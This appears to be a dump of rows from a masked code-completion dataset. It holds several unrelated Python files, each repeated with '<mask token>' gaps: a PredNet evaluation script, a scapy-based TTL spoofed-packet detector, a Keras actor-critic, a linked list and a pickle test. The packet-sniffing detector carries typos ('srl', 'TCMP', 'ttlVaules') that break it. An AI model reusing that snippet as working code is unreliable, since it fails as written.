| <mask token>
import os
import numpy as np
from six.moves import cPickle
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Input, Dense, Flatten
from prednet import PredNet
from data_utils import SequenceGenerator
from kitti_settings import *
n_plot = 40
batch_size = 10
nt = 5
weights_file = os.path.join(WEIGHTS_DIR,
'prednet_facebook_segmpred_weights.hdf5')
json_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_model.json')
test_file = os.path.join(DATA_DIR, 'facebook_segmpred_X_test.hkl')
test_sources = os.path.join(DATA_DIR, 'facebook_segmpred_sources_test.hkl')
f = open(json_file, 'r')
json_string = f.read()
f.close()
train_model = model_from_json(json_string, custom_objects={'PredNet': PredNet})
train_model.load_weights(weights_file)
layer_config = train_model.layers[1].get_config()
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'
] if 'data_format' in layer_config else layer_config['dim_ordering']
test_prednet = PredNet(weights=train_model.layers[1].get_weights(), **
layer_config)
test_generator = SequenceGenerator(test_file, test_sources, nt,
sequence_start_mode='unique', data_format=data_format)
X_test = test_generator.create_all()
input_shape = X_test.shape[1:]
inputs = Input(shape=tuple(input_shape))
predictions = test_prednet(inputs)
test_model = Model(inputs=inputs, outputs=predictions)
X_hat = test_model.predict(X_test, batch_size)
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
mse_model = np.mean((X_test[:, 1:] - X_hat[:, 1:]) ** 2)
mse_prev = np.mean((X_test[:, :-1] - X_test[:, 1:]) ** 2)
if not os.path.exists(RESULTS_SAVE_DIR):
os.mkdir(RESULTS_SAVE_DIR)
f = open(RESULTS_SAVE_DIR + 'prediction_scores.txt', 'w')
f.write('Model MSE: %f\n' % mse_model)
f.write('Previous Frame MSE: %f' % mse_prev)
f.close()
aspect_ratio = float(X_hat.shape[2]) / X_hat.shape[3]
plt.figure(figsize=(nt, 2 * aspect_ratio))
gs = gridspec.GridSpec(2, nt)
gs.update(wspace=0.0, hspace=0.0)
plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_plots/')
if not os.path.exists(plot_save_dir):
os.mkdir(plot_save_dir)
plot_idx = np.random.permutation(X_test.shape[0])[:n_plot]
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
| # -*- coding: UTF-8 -*-
'''
Evaluate trained PredNet on KITTI sequences.
Calculates mean-squared error and plots predictions.
'''
import os
import numpy as np
from six.moves import cPickle
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Input, Dense, Flatten
from prednet import PredNet
from data_utils import SequenceGenerator
from kitti_settings import *
n_plot = 40
batch_size = 10
nt = 5
# 相关的weights,json的文件
weights_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_weights.hdf5')
json_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_model.json')
# weights_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_weights.hdf5')
# json_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_model.json')
# weights_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_weights-extrapfinetuned.hdf5') # where weights will be saved
# json_file = os.path.join(WEIGHTS_DIR, 'prednet_kitti_model-extrapfinetuned.json')
test_file = os.path.join(DATA_DIR, 'facebook_segmpred_X_test.hkl')
test_sources = os.path.join(DATA_DIR, 'facebook_segmpred_sources_test.hkl')
# Load trained model
# 加载模型的json文件
f = open(json_file, 'r')
# 读取的json文件
json_string = f.read()
f.close()
# 从训练后存储的模型中序列化出模型,同时包含PredNet模型定制的参数,之后加载权重模型
# 存储模型将相应的json文件和weights文件存储即可,加载模型从对应的json文件和weights文件反序列化即可
train_model = model_from_json(json_string, custom_objects = {'PredNet': PredNet})
train_model.load_weights(weights_file)
# Create testing model (to output predictions)
# 创建测试模型
# 训练模型包含了InputLayer,PredNet等等,这里选取第二层即为PredNet
# print(train_model.layers)
layer_config = train_model.layers[1].get_config()
# 评估版本中将output_mode输出模型从误差error修改为predication预测
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'] if 'data_format' in layer_config else layer_config['dim_ordering']
# 将网络中部分修改参数加载重构为PredNet网络,keras中具有get_config和get_weights等方法
test_prednet = PredNet(weights=train_model.layers[1].get_weights(), **layer_config)
# 输入层的shape为不包括batch的batch_input_shape从第一列之后的所有
# input_shape = list(train_model.layers[0].batch_input_shape[1:])
# 输入数据为nt,总共有10帧,来预测将来的一帧
# input_shape[0] = nt
# print('input_shape:', input_shape)
test_generator = SequenceGenerator(test_file, test_sources, nt, sequence_start_mode='unique', data_format=data_format)
X_test = test_generator.create_all()
input_shape = X_test.shape[1:]
# print('input_shape:', input_shape)
# 构建输入层
inputs = Input(shape=tuple(input_shape))
# 将输入层输入到prednet网络中测试输出
predictions = test_prednet(inputs)
# 构建输入和输出模型
test_model = Model(inputs=inputs, outputs=predictions)
# 测试评估数据生成器
# test_generator = SequenceGenerator(test_file, test_sources, nt, sequence_start_mode='unique', data_format=data_format)
# X_test = test_generator.create_all()
# 预测模型时参照batch_size,一个批次的进行load然后predict
X_hat = test_model.predict(X_test, batch_size)
# 这里模型的默认通道均在最后一位
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
# Compare MSE of PredNet predictions vs. using last frame. Write results to prediction_scores.txt
# 比较测试结果
mse_model = np.mean( (X_test[:, 1:] - X_hat[:, 1:])**2 ) # look at all timesteps except the first
mse_prev = np.mean( (X_test[:, :-1] - X_test[:, 1:])**2 )
if not os.path.exists(RESULTS_SAVE_DIR): os.mkdir(RESULTS_SAVE_DIR)
f = open(RESULTS_SAVE_DIR + 'prediction_scores.txt', 'w')
f.write("Model MSE: %f\n" % mse_model)
f.write("Previous Frame MSE: %f" % mse_prev)
f.close()
# Plot some predictions
aspect_ratio = float(X_hat.shape[2]) / X_hat.shape[3]
plt.figure(figsize = (nt, 2*aspect_ratio))
gs = gridspec.GridSpec(2, nt)
gs.update(wspace=0., hspace=0.)
plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_plots/')
if not os.path.exists(plot_save_dir): os.mkdir(plot_save_dir)
plot_idx = np.random.permutation(X_test.shape[0])[:n_plot]
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i,t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off', left='off', right='off', labelbottom='off', labelleft='off')
if t==0: plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i,t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off', left='off', right='off', labelbottom='off', labelleft='off')
if t==0: plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
| [
0,
1,
2,
3,
4
] |
1,616 | 7081211336793bfde60b5c922f6ab9461a475949 | import time
import optparse
from IPy import IP as IPTEST
ttlValues = {}
THRESH = 5
def checkTTL(ipsrc,ttl):
if IPTEST(ipsrc).iptype() == 'PRIVATE':
return
if not ttlValues.has_key(ipsrc):
pkt = srl(IP(dst=ipsrc) / TCMP(),retry=0,timeout=0,verbose=0)
ttlValues[ipsrc] = pkt.ttl
if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
print '\n[!] Detected Possible Spoofed Packer From:'+ipsrc
print '[!] TTL:'+ttl+',Actual TTL:'+str(ttlVaules[ipsrc])
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src
ttl = str(pkt.ttl)
checkTTL(ipsrc,ttl)
except:
pass
def main():
parser = optparse.OptionParser("usage%prog"+"-i<interface> -t<thresh>")
parser.add_option('-i',dest='iface',type='string',help='specify network interface')
parser.add_option('-t',dest='thresh',type='int',help='specify threshold count')
(options,args) = parser.parse_args()
if options.iface == None:
conf.iface = 'eth0'
else:
conf.iface = options.iface
if options.thresh != None:
THRESH = options.thresh
else:
THRESH = 5
sniff(prn=testTTL,store=0)
if __name__ == '__main__':
main() | null | null | null | null | [
0
] |
1,617 | 535fdee8f74b1984c5d1a5ec929310473b01239d | <mask token>
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
<mask token>
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
<mask token>
| <mask token>
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
<mask token>
| <mask token>
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
if __name__ == '__main__':
actor = Actor(4, 1, 2)
critic = Critic(4, 1)
obs = np.random.rand(4)
action = actor.act(obs)[0]
q_val = critic.estimate_q(obs, action)[0]
print('\nRandom actor-critic output for obs={}:'.format(obs))
print('Action: {}, Qval: {}'.format(action, q_val))
| import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.initializers import RandomUniform
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
action_input = keras.Input(shape=(self.action_dim,), dtype=
'float32', name='action')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='c_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='c_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
w_range = 0.003
q_val = keras.layers.Dense(1, activation='linear', name='q_val',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype='float32',
name='obs')
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation='relu', name='a_lr_0',
kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
lr_0 = keras.layers.BatchNormalization()(lr_0)
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation='relu', name='a_lr_1',
kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
lr_1 = keras.layers.BatchNormalization()(lr_1)
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim,
activation='tanh', name='action', kernel_initializer=
RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
if __name__ == '__main__':
actor = Actor(4, 1, 2)
critic = Critic(4, 1)
obs = np.random.rand(4)
action = actor.act(obs)[0]
q_val = critic.estimate_q(obs, action)[0]
print('\nRandom actor-critic output for obs={}:'.format(obs))
print('Action: {}, Qval: {}'.format(action, q_val))
| import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.initializers import RandomUniform
class Critic:
def __init__(self, obs_dim, action_dim, learning_rate=0.001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
# self.model.compile(loss="mse", optimizer=self.optimizer)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype="float32", name="obs")
action_input = keras.Input(shape=(self.action_dim,), dtype="float32", name="action")
# layer 0 - with obs input
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation="relu", name="c_lr_0", kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
# add
lr_0 = keras.layers.BatchNormalization()(lr_0)
# layer 1 with concatenated input of [lr_0, action]
lr_1_input = keras.layers.concatenate([lr_0, action_input])
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation="relu", name="c_lr_1", kernel_initializer=RandomUniform(-w_range, w_range))(lr_1_input)
# final layers with linear activation
w_range = 0.003
q_val = keras.layers.Dense(1, activation="linear", name="q_val", kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=[obs_input, action_input], outputs=q_val)
return model
def estimate_q(self, obs, action):
obs = tf.reshape(obs, (-1, self.obs_dim))
action = tf.reshape(action, (-1, self.action_dim))
return self.model([obs, action])
class Actor:
# 输入特征数,动作特征数,奖励
def __init__(self, obs_dim, action_dim, action_gain, learning_rate=0.0001):
self.obs_dim = obs_dim
self.action_dim = action_dim
self.action_gain = action_gain
self.model = self.make_network()
self.optimizer = keras.optimizers.Adam(learning_rate)
def make_network(self):
obs_input = keras.Input(shape=(self.obs_dim,), dtype="float32", name="obs")
# layer 0 - with obs input
w_range = 1 / np.sqrt(self.obs_dim)
lr_0 = keras.layers.Dense(400, activation="relu", name="a_lr_0", kernel_initializer=RandomUniform(-w_range, w_range))(obs_input)
# add
lr_0 = keras.layers.BatchNormalization()(lr_0)
# layer 1
w_range = 1 / np.sqrt(400.0)
lr_1 = keras.layers.Dense(300, activation="relu", name="a_lr_1", kernel_initializer=RandomUniform(-w_range, w_range))(lr_0)
# add
lr_1 = keras.layers.BatchNormalization()(lr_1)
# action layer
# tanh 函数输出在(-1, 1)之间,用action_gain缩放
w_range = 0.003
action = self.action_gain * keras.layers.Dense(self.action_dim, activation="tanh", name="action", kernel_initializer=RandomUniform(-w_range, w_range))(lr_1)
model = keras.Model(inputs=obs_input, outputs=action)
return model
def act(self, obs):
# 将状态转换为批量的形式
obs = tf.reshape(obs, (-1, self.obs_dim))
return self.model(obs)
if __name__ == "__main__":
actor = Actor(4, 1, 2)
critic = Critic(4, 1)
obs = np.random.rand(4)
action = actor.act(obs)[0]
q_val = critic.estimate_q(obs, action)[0]
# keras.utils.plot_model(actor, 'actor.png', show_shapes=True)
# keras.utils.plot_model(critic, 'critic.png', show_shapes=True)
print("\nRandom actor-critic output for obs={}:".format(obs))
print("Action: {}, Qval: {}".format(action, q_val))
| [
7,
8,
9,
10,
11
] |
1,618 | 192bd3c783f6f822f8e732ddf47d7fc3b22c032b | <mask token>
class LinkedList(object):
<mask token>
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
<mask token>
<mask token>
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
<mask token>
def __len__(self):
"""Return length of linked list."""
return self.size()
<mask token>
| <mask token>
class LinkedList(object):
<mask token>
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError('Empty list, unable to pop')
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace('[', '(').replace(']', ')')
def __len__(self):
"""Return length of linked list."""
return self.size()
def __str__(self):
"""Display the linked list."""
return self.display()
| <mask token>
class Node(object):
<mask token>
<mask token>
class LinkedList(object):
"""Build linked list."""
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError('Empty list, unable to pop')
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace('[', '(').replace(']', ')')
def __len__(self):
"""Return length of linked list."""
return self.size()
def __str__(self):
"""Display the linked list."""
return self.display()
| <mask token>
class Node(object):
"""Build a node object."""
def __init__(self, data=None, next=None):
"""Constructor for the Node object."""
self.data = data
self.next = next
class LinkedList(object):
"""Build linked list."""
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError('Empty list, unable to pop')
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace('[', '(').replace(']', ')')
def __len__(self):
"""Return length of linked list."""
return self.size()
def __str__(self):
"""Display the linked list."""
return self.display()
| """Create a new Node object and attach it a Linked List."""
class Node(object):
"""Build a node object."""
def __init__(self, data=None, next=None):
"""Constructor for the Node object."""
self.data = data
self.next = next
class LinkedList(object):
"""Build linked list."""
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError("Empty list, unable to pop")
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError("Nothing in the list.")
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError("No such node.")
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace("[", "(").replace("]", ")")
def __len__(self): # pragma: no cover
"""Return length of linked list."""
return self.size()
def __str__(self): # pragma: no cover
"""Display the linked list."""
return self.display()
| [
6,
10,
12,
14,
15
] |
1,619 | 6acb253189798c22d47feb3d61ac68a1851d22ba | <mask token>
| <mask token>
try:
copyfile(serial_filename(), temp_filename)
serial_output_code.serial_output_code()
with open(serial_filename(), 'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename, 'rb') as f:
old_out = pickle.load(f)
finally:
copyfile(temp_filename, serial_filename())
remove(temp_filename)
assert qmc_out[0] == old_out[0]
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == len(old_out) + 1
for ii in range(1, len(old_out)):
assert len(old_out[ii]) == len(qmc_out[ii])
for jj in range(len(qmc_out[1])):
assert np.all(np.isclose(qmc_out[ii][jj], old_out[ii][jj]))
| <mask token>
temp_filename = 'temp.pickle'
try:
copyfile(serial_filename(), temp_filename)
serial_output_code.serial_output_code()
with open(serial_filename(), 'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename, 'rb') as f:
old_out = pickle.load(f)
finally:
copyfile(temp_filename, serial_filename())
remove(temp_filename)
assert qmc_out[0] == old_out[0]
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == len(old_out) + 1
for ii in range(1, len(old_out)):
assert len(old_out[ii]) == len(qmc_out[ii])
for jj in range(len(qmc_out[1])):
assert np.all(np.isclose(qmc_out[ii][jj], old_out[ii][jj]))
| import pickle
from generation_code import serial_filename
import serial_output_code
import numpy as np
from shutil import copyfile
from os import remove
temp_filename = 'temp.pickle'
try:
